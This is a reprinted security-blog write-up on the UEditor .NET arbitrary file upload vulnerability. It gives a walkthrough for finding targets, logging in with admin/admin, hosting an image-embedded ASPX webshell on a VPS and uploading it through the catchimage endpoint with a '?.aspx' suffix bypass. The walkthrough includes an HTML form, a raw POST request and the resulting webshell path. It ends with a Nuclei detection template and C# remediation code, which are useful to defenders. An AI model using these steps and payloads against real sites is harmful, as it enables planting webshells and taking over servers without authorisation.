UEditor editor arbitrary file upload vulnerability

admin, 2023-10-14 02:28:19, 232 views, 5697 characters, 18 min 59 s read

    UEditor is a web page editor developed by Baidu; it is no longer developed or maintained. This vulnerability exists only in the .NET version of the editor. The PHP, JSP and ASP versions are not affected. The .NET version allows arbitrary file upload that bypasses the file-format restriction: when it fetches a remote resource, it does not strictly filter or validate the format of the remote file.

Affected scope

This vulnerability affects the .NET version of UEditor; the versions for other languages are currently unaffected.

Vulnerability principle

The root cause is that, when fetching an image resource, only the ContentType of the response is checked. That check can be bypassed, which leads to arbitrary file upload.


Reproduction

Step 1: Use the following search syntax to search for assets and choose the target...

# Search syntax
app="Baidu-UEditor"

Step 2: Weak credentials give direct access to the backend. While editing an article, identify the editor in use and append the following path; if the following information is returned, the vulnerability is essentially confirmed...

# Weak credentials
username: admin
password: admin
# Appended path
/UEditor/net/controller.ashx?action=catchimage  // access the controller file


Step 3: Turn the following ASPX webshell into an image-embedded shell with WinHex, host it on a VPS and make its address reachable....




Step 4: Create an HTML file as follows. Since the form does not itself upload a file, enctype does not need to be set to multipart/form-data. Open the finished file in a browser and enter the address of the file on the VPS in the input box; note that the ?.aspx suffix is appended to the file address to bypass the upload check so that the fetched file is parsed as an aspx file. Click Submit to upload the file.

# Content of the upload HTML file
<form action="http://ip/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p>
  <input type="submit" value="Submit" />
</form>
# Image address
http://vpsip/ue1.jpg?.aspx  // note: the file is stored on the VPS as ue1.jpg, but the ?.aspx suffix must be appended when uploading


Step 5: Assemble the path of the uploaded file and connect to it with Godzilla... success!

# Webshell address
http://ip/ueditor/net/upload/image/20230920/6383080145411107007710081.aspx



POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

source[]=http://ip/8080/ue1.jpg?.aspx

Batch script (Nuclei template)

id: ueditor-file-upload

info:
  name: UEditor - Arbitrary File Upload
  author: princechaddha
  severity: high
  description: UEditor contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://zhuanlan.zhihu.com/p/85265552
    - https://www.freebuf.com/vuls/181814.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
  tags: ueditor,fileupload
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/admin/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/editor/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/scripts/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/js/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/ueditor/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/ue/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/content/scripts/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/content/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/assets/js/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/core/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/editor/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/components/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/utility/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/plugin/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/script/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/areas/admin/content/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/hieditor/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/manage/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/utf8-net/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/content/js/plugins/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"
      - "{{BaseURL}}/editor/net/controller.ashx?action=catchimage&encode=utf-8"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "没有指定抓取源"
        part: body

Remediation


1. Modify the file net/App_Code/CrawlerHandler.cs in the project directory and add code that checks the file type.
2. Use a WAF product to stop attackers from uploading malicious files.
3. Check the upload path for recently uploaded malformed images and for dangerous file types such as asp and aspx. If you find anomalous files, confirm them and delete them promptly.
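As an added example (not UEditor's own code and not a drop-in for CrawlerHandler.cs), the helpers below show the checks that fix items 1 and 3 call for: the saved extension is whitelisted from the URL path rather than the raw URL string, the downloaded bytes are checked against their magic number instead of trusting the remote Content-Type, and the upload root is swept for files that do not look like images. The caller is assumed to perform the download itself and pass the bytes in.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;

// Added example, not UEditor's own code: hardened source checks for a remote-image
// "catcher" like the catchimage action, plus the upload-directory sweep from fix item 3.
// Assumption: the caller downloads the URL into a byte[] itself before validating it.
public static class RemoteImageGuard
{
    static readonly string[] AllowedExt = { ".jpg", ".jpeg", ".png", ".gif", ".bmp" };
    // Whitelisted extension of the URL *path*, or null to reject the source.
    // Uri.AbsolutePath drops the query string, so "http://host/ue1.jpg?.aspx" yields "/ue1.jpg";
    // Path.GetExtension applied to the raw URL string would instead return ".aspx".
    public static string GetSafeExtension(string sourceUrl)
    {
        Uri uri;
        if (!Uri.TryCreate(sourceUrl, UriKind.Absolute, out uri)) return null;
        if (uri.Scheme != Uri.UriSchemeHttp && uri.Scheme != Uri.UriSchemeHttps) return null;
        string ext = Path.GetExtension(uri.AbsolutePath).ToLowerInvariant();
        return AllowedExt.Contains(ext) ? ext : null;
    }
    // Magic-number check: the remote Content-Type header is attacker-controlled, the bytes are not.
    public static bool MatchesMagic(byte[] d, string ext)
    {
        if (d == null || d.Length < 8) return false;
        switch (ext)
        {
            case ".jpg": case ".jpeg": return d[0] == 0xFF && d[1] == 0xD8 && d[2] == 0xFF;
            case ".png": return d.Take(8).SequenceEqual(new byte[] { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A });
            case ".gif": return d[0] == 'G' && d[1] == 'I' && d[2] == 'F' && d[3] == '8' && (d[4] == '7' || d[4] == '9') && d[5] == 'a';
            case ".bmp": return d[0] == 'B' && d[1] == 'M';
            default: return false;
        }
    }
    // Fix item 3: report files under the upload root that carry a non-image extension
    // (.aspx, .asp, .ashx ...) or whose leading bytes do not match the extension they carry.
    public static IEnumerable<string> FindSuspiciousFiles(string uploadRoot)
    {
        foreach (string f in Directory.EnumerateFiles(uploadRoot, "*", SearchOption.AllDirectories))
        {
            string ext = Path.GetExtension(f).ToLowerInvariant();
            if (!AllowedExt.Contains(ext)) { yield return f; continue; }
            byte[] head = new byte[8]; int n;
            using (FileStream fs = File.OpenRead(f)) n = fs.Read(head, 0, 8);
            if (n < 8 || !MatchesMagic(head, ext)) yield return f;
        }
    }
}
```

A polyglot image with an embedded script still passes the magic-number check, so the stored file name must be server-generated (random name plus the whitelisted extension, nothing copied from the URL) and script execution should stay disabled on the upload directory.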


    The techniques, ideas and tools described in articles published or reprinted by 揽月安全团队 (Lanyue Security Team) are provided solely for security-oriented learning and exchange. Nobody may use them for illegal or profit-making purposes; anyone who does bears the consequences themselves!!!!!









Originally published on the WeChat official account 揽月安全团队 (Lanyue Security Team): Ueditor编辑器任意文件上传漏洞

Posted by admin on 2023-10-14 02:28:19. When reprinting, please keep this link (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/2102258.html
